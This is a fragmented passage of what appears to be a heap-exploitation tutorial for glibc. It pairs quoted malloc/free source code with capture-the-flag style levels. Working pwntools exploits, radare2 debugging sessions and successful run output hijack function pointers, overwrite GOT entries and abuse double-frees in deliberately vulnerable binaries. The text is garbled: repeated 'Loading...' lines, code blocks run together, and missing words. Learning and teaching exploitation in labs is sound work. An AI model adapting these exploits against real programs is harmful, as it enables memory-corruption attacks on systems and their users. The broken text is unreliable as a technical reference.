Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
struct heapStructure {
int priority;
char *name;
};
int main(int argc, char **argv) {
struct heapStructure *i1, *i2;
i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
void winner() {
printf(
"Congratulations, you've completed this level @ %ld seconds past the "
"Epoch\n",
time(NULL));
}heapStructure$ r2 -d -A heap1 AAAA BBBB$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts$ ragg2 -P 200 -r
AABAA...$ r2 -d -A heap1 AAABAA... 0000[0x004006cd]> wopO 0x41415041414f4141
40from pwn import *
elf = context.binary = ELF('./heap1', checksec=False)
param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
printf("%s", "Name: ");
read(0, name, 0x20);
printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[userCount], users[userCount]);
userCount++;
}void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
char *name = users[choice];
printf("User %d:\n\tName: %s\n", choice, name, name);
// Check user actually exists before freeing
if(choice < 0 || choice >= userCount) {
puts("Invalid Index!");
return;
}
else {
free(name);
puts("User freed!");
}
}void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");
return;
}
}from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())create('yes')
create('yes')
delete(0)
delete(1)
delete(0)r2 -d $(pidof vuln)create(p64(0x08080808))
pause()p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
[...]
create('junk1')
create('junk2')
pause()create(p64(fake_metadata))create('\x00' * 8 + 'admin\x00')
complete()$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
create(p64(fake_metadata))
create('junk1')
create('junk2')
create('\x00' * 8 + 'admin\x00')
complete()if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))if (__glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): corrupted top size");#include <stdio.h>
#include <stdlib.h>
int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);
printf("a: %p\nb: %p\nc: %p\n", a, b, c);
puts("Freeing...");
free(a);
free(b);
free(c);
puts("Allocating...");
char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);
printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010HEAD --> a -> bHEAD --> a -> b -> cHEAD --> c -> a -> b
A is the , which is set when the chunk is not located in main_arena; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A bit setstruct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

Still learning :)


Consolidating fastbins



free_int_mallocmmap/*
If this is a large request, consolidate fastbins before continuing [...]
*/
else
{
idx = largebin_index (nb);
if (atomic_load_relaxed (&av->have_fastchunks))
malloc_consolidate (av);
}if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}Creating more heap space
victim = av->top;
size = chunksize (victim);
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
int main(int argc, char **argv) {
struct data *d;
struct fp *f;
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
fflush(stdout);
f->fp();
return 0;
}1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]named$ r2 -d -A heap0 AAAAAAAAAAAA <== that's just a parameter
$ s main; pdf
[...]
0x0040075d e8fefdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x00400762 488b45f8 mov rax, qword [var_8h]
[...][0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762$ ragg2 -P 200 -r$ r2 -d -A heap0 AAABAACAADAAE...[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d[0x0040075d]> dc
hit breakpoint at: 0x400762[0x00400762]> wopO 0x6441416341416241
80from pwn import *
elf = context.binary = ELF('./heap0')
payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))FD = P->fd; /* forward chunk */
BK = P->bk; /* backward chunk */
FD->bk = BK; /* update forward chunk's bk pointer */
BK->fd = FD; /* updated backward chunk's fd pointer */

#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}unlink()FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
BK->fd = FD (0x10000000 + 0x8 = 0x56555780)FD->bk = BK (0x56555780 + 0xc = 0x10000000)FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else {
FD->bk = BK;
BK->fd = FD;
}char *a = malloc(0x20);
free(a);
free(a);char *b = malloc(0x20);strcpy(b, "\x78\x56\x34\x12");malloc(0x20) /* This is yet another 'a', we can ignore this */
char *controlled = malloc(0x20); /* This is in the location we want */






New and efficient heap management
Reintroducing double-frees


#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("<funcname>(): "
"unaligned fastbin chunk detected")if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("tcache_thread_shutdown(): "
"unaligned tcache chunk detected");if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected");if (__glibc_unlikely (misaligned_chunk (victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}The first heap exploits
A primitive double-free protection
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endifif (__glibc_unlikely (e->key == tcache))tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}static void tcache_key_initialize (void)
{
if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)
!= sizeof (tcache_key))
{
tcache_key = random_bits ();
#if __WORDSIZE == 64
tcache_key = (tcache_key << 32) | random_bits ();
#endif
}
}